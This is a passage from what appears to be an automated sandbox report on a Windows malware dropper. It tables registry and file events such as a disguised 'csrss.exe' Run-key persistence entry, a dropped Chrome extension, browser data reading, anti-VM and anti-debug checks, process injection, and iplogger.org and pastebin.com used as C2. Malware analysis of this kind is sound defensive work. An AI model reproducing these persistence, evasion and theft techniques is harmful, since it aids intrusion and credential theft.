| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun157e7a96e632.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-0F5D4.tmp\Sun15b94526a807b.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-0F5D4.tmp\Sun15b94526a807b.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-JE0HU.tmp\Sun15b94526a807b.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
Reads user/profile data of web browsers
System Binary Proxy Execution: Odbcconf
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\odbcconf.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156aa32cae4a.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfhgpjbcoignfibliobpclhpfnadhofn\10.59.13_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15132bf2c585337a0.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1515dbfc0edab0.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 692 set thread context of 3820 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe |
| PID 2988 set thread context of 1060 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15c4c762b69ba5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\11111.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15e81af69f990d3a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15a8461882.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun154ca5fada.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1524d92394d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun157e7a96e632.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15b94526a807b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1585e1028b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156d9ca8467.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun1507dd11d509.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-JE0HU.tmp\Sun15b94526a807b.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun150e9a93676ff.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15132bf2c585337a0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun156aa32cae4a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15c4c762b69ba5.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15c4c762b69ba5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4CEB53C7\Sun15c4c762b69ba5.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Windows\rss\csrss.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Windows\rss\csrss.exe | N/A |
